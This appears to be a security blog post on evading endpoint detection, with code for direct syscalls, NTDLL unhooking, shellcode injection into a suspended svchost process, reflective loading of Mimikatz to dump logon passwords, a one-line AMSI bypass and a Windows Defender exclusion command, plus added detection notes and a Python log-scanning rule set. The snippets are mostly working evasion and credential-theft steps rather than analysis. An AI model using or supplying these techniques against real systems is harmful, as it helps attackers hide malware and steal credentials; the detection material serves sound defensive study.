Antivirus Bypass Techniques: A Deep Dive into EDR Evasion

Security researchers and red teamers constantly explore methods to bypass Endpoint Detection and Response (EDR) solutions. Understanding these techniques is crucial for both offensive and defensive cybersecurity professionals.

You Should Know: Practical EDR Bypass Techniques

1. Process Injection with Syscalls (Direct System Calls)

Many EDR solutions hook user-mode APIs (typically the `Nt*` stubs in `ntdll.dll`) to monitor suspicious activity. Bypassing these hooks involves issuing the syscall directly, so the hooked stub is never executed; note that kernel-side telemetry (kernel callbacks, ETW threat-intelligence providers) still observes the call.

Example (x64 Assembly for NtAllocateVirtualMemory):

mov r10, rcx
mov eax, 18h ; Syscall number for NtAllocateVirtualMemory (0x18 on the author's build; syscall numbers change between Windows versions)
syscall
ret

C++ Implementation:

#include <windows.h>
#include <winternl.h>   // NTSTATUS
#include <iostream>

// Prototype of the ntdll export; BaseAddress is passed by pointer.
typedef NTSTATUS(NTAPI *pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

int main() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    // Note: this resolves and calls the ntdll export, so it still runs through any
    // user-mode hook placed on that stub; only the hand-written syscall stub above avoids it.
    pNtAllocateVirtualMemory NtAllocateVirtualMemory =
        (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory");
    if (!ntdll || !NtAllocateVirtualMemory) return 1;

    PVOID baseAddr = NULL;
    SIZE_T size = 0x1000;
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &baseAddr, 0, &size,
                                              MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    std::cout << "Status: 0x" << std::hex << status
              << ", memory allocated at: " << baseAddr << std::endl;
    return 0;
}

2. Unhooking NTDLL.dll

EDRs often hook `NTDLL.dll` functions. Unhooking involves overwriting the hooked functions in memory with clean copies taken from the on-disk file. Detection note: the rewrite of ntdll's code section is itself observable (its in-memory `.text` no longer matches what the EDR placed there), and a second copy of `ntdll.dll` appearing outside `System32` is an artifact worth alerting on.

Steps:

1. Read `NTDLL.dll` from disk.

2. Map a clean copy into memory.

3. Overwrite hooked functions in memory.

PowerShell Command to Dump Clean NTDLL:

# -Encoding Byte is Windows PowerShell 5.1 syntax (PowerShell 7 uses -AsByteStream);
# -ReadCount 0 returns the whole file as one byte array instead of one object per byte
$ntdll = Get-Content -Path "C:\Windows\System32\ntdll.dll" -Encoding Byte -ReadCount 0
[System.IO.File]::WriteAllBytes("C:\clean_ntdll.dll", $ntdll)

3. Process Hollowing (Legit Process Replacement)

A technique where a legitimate process is created in a suspended state, its original image is unmapped, and attacker code is written in its place before the main thread is resumed, so the activity appears to come from a trusted binary.

Example (C++):

STARTUPINFOA si = { sizeof(si) };   // ANSI variant to match CreateProcessA
PROCESS_INFORMATION pi = { 0 };
// Backslashes must be escaped inside a C string literal
if (!CreateProcessA("C:\\Windows\\System32\\svchost.exe", NULL, NULL, NULL, FALSE,
                    CREATE_SUSPENDED, NULL, NULL, &si, &pi))
    return 1;

// Write the payload into the suspended process and run it from an APC on its main thread.
// shellcode / shellcodeSize are the payload buffer and its length (not defined in this excerpt).
// Note: as written this never unmaps the original image (there is no NtUnmapViewOfSection
// call), so it is APC injection into a suspended process rather than full hollowing.
LPVOID remoteMem = VirtualAllocEx(pi.hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, remoteMem, shellcode, shellcodeSize, NULL);
QueueUserAPC((PAPCFUNC)remoteMem, pi.hThread, (ULONG_PTR)remoteMem);
ResumeThread(pi.hThread);

4. Reflective DLL Injection

Loading a DLL (or any PE) directly from memory without writing it to disk, so file-based scanning never sees it.

Example (PowerSploit's Invoke-ReflectivePEInjection loading Mimikatz):

Invoke-ReflectivePEInjection -PEBytes $mimikatzBytes -ExeArgs "sekurlsa::logonpasswords" 

5. AMSI Bypass (For PowerShell Evasion)

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Script block logging (Event ID 4104) records this command whether or not it succeeds, and the unobfuscated string is itself a well-known AMSI signature.

What Undercode Say

EDR evasion is a cat-and-mouse game. Security vendors continuously improve detection, while attackers develop new bypass methods. Key takeaways:
– Direct syscalls evade user-mode hooks.
– Unhooking NTDLL restores original function behavior.
– Process hollowing abuses trusted processes.
– Reflective loading avoids disk-based detection.
– AMSI bypasses disable script scanning.

Linux Equivalent Commands:

# Trace the syscalls a binary makes; strace observes them at the kernel boundary,
# so hooked libc wrappers cannot hide them (modern glibc uses openat rather than open)
strace -e trace=open,openat,read,write ./malicious_binary

// Manual syscall invocation (32-bit x86): write(1, message, 12) without the libc wrapper.
// Build with gcc -m32 -no-pie (the absolute $message reference is not position-independent).
char message[] = "Hello World\n"; /* exactly 12 bytes */
int main(void) {
    __asm__ __volatile__(
        "movl $4, %%eax\n"       // write syscall number (32-bit ABI)
        "movl $1, %%ebx\n"       // fd 1 = stdout
        "movl $message, %%ecx\n" // buffer address
        "movl $12, %%edx\n"      // byte count
        "int $0x80"              // enter the kernel directly
        : : : "eax", "ebx", "ecx", "edx", "memory");
    return 0;
}

Windows Defender Exclusion Bypass:

powershell -Command "Add-MpPreference -ExclusionPath 'C:\Temp\'"

This requires local administrator rights and leaves a clear artifact: every exclusion change is written to the Defender operational log as Event ID 5007 ("antimalware platform configuration changed").
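Each of the five techniques summarized in the takeaways above, and the exclusion change just shown, leaves a log artifact. As an added example that is not part of the original post, the following Python sketch runs a small rule set over constructed sample events written in a simplified one-line `EventID|key=value;...` form (not real Windows event XML). The event IDs are the real ones (PowerShell 4104 script block logging, Defender 5007 configuration change, Sysmon 1 process create and 11 file create); the rule logic and thresholds are assumptions.

```python
import re

# Constructed sample events, one per line, simplified to the fields the rules use.
SAMPLE_EVENTS = r"""
4104|ScriptBlockText=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
4104|ScriptBlockText=Invoke-ReflectivePEInjection -PEBytes $bytes -ExeArgs "sekurlsa::logonpasswords"
4104|ScriptBlockText=Get-ChildItem C:\Users\bob
5007|Message=Windows Defender Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Temp\ = 0x0
1|Image=C:\Windows\System32\svchost.exe;ParentImage=C:\Users\bob\tool.exe
1|Image=C:\Windows\System32\svchost.exe;ParentImage=C:\Windows\System32\services.exe
11|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe;TargetFilename=C:\clean_ntdll.dll
"""

def parse_event(line):
    """Split one constructed line into (event_id, {field: value})."""
    event_id, _, body = line.partition("|")
    fields = dict(kv.split("=", 1) for kv in body.split(";") if "=" in kv)
    return event_id, fields

# Each rule: (event id it applies to, predicate over the fields, finding label).
RULES = [
    ("4104", lambda f: re.search(r"AmsiUtils.*amsiInitFailed", f.get("ScriptBlockText", ""), re.I),
     "AMSI bypass via amsiInitFailed"),
    ("4104", lambda f: re.search(r"Invoke-ReflectivePEInjection", f.get("ScriptBlockText", ""), re.I),
     "reflective PE injection from PowerShell"),
    ("5007", lambda f: re.search(r"\\Exclusions\\", f.get("Message", ""), re.I),
     "Defender exclusion added"),
    # svchost.exe is normally started by services.exe; any other parent is suspicious.
    ("1", lambda f: f.get("Image", "").lower().endswith(r"\svchost.exe")
     and not f.get("ParentImage", "").lower().endswith(r"\services.exe"),
     "svchost.exe with unexpected parent (possible hollowing)"),
    # A fresh ntdll.dll copy outside the Windows directory is an unhooking artifact.
    ("11", lambda f: re.search(r"ntdll\.dll$", f.get("TargetFilename", ""), re.I)
     and not f.get("TargetFilename", "").lower().startswith("c:\\windows\\"),
     "ntdll.dll copy written outside System32 (possible unhooking prep)"),
]

def scan(text):
    """Return a list of (event_id, finding) for every rule that fires, in log order."""
    findings = []
    for line in text.strip().splitlines():
        event_id, fields = parse_event(line)
        for rule_id, pred, label in RULES:
            if rule_id == event_id and pred(fields):
                findings.append((event_id, label))
    return findings

if __name__ == "__main__":
    for event_id, label in scan(SAMPLE_EVENTS):
        print(event_id, label)
```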

Expected Output:

A functional EDR bypass PoC demonstrating evasion techniques in a controlled environment.

Reported By: Malfuzzer Just – Hackers Feeds